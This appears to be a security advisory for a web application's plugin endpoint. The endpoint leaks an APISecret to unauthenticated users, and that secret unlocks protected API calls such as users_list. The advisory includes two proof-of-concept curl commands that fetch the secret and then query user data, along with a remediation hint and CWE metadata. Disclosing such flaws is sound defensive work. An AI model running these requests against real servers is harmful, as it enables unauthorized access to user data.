An unauthenticated user can read APISecret from objects/plugins.json.php and use it to call protected API endpoints
(e.g. users_list) without logging in.
objects/plugins.json.php is public and still exposes plugin object_data containing APISecret.
That secret is accepted by plugin/API/get.json.php as authentication.
APISecret):curl 'http://<host>/objects/plugins.json.php'
curl --get 'http://<host>/plugin/API/get.json.php' \
--data-urlencode 'APIName=users_list' \
--data-urlencode 'APISecret=<APISecret>' \
--data-urlencode 'rowCount=3' \
--data-urlencode 'current=1'
Unauthenticated disclosure of sensitive config (APISecret) leading to unauthorized access to protected API data.
Requiring admin auth for full plugin inventory/config endpoint.
{
"cwe_ids": [
"CWE-200",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T22:20:42Z",
"nvd_published_at": "2026-05-11T22:22:13Z",
"severity": "HIGH"
}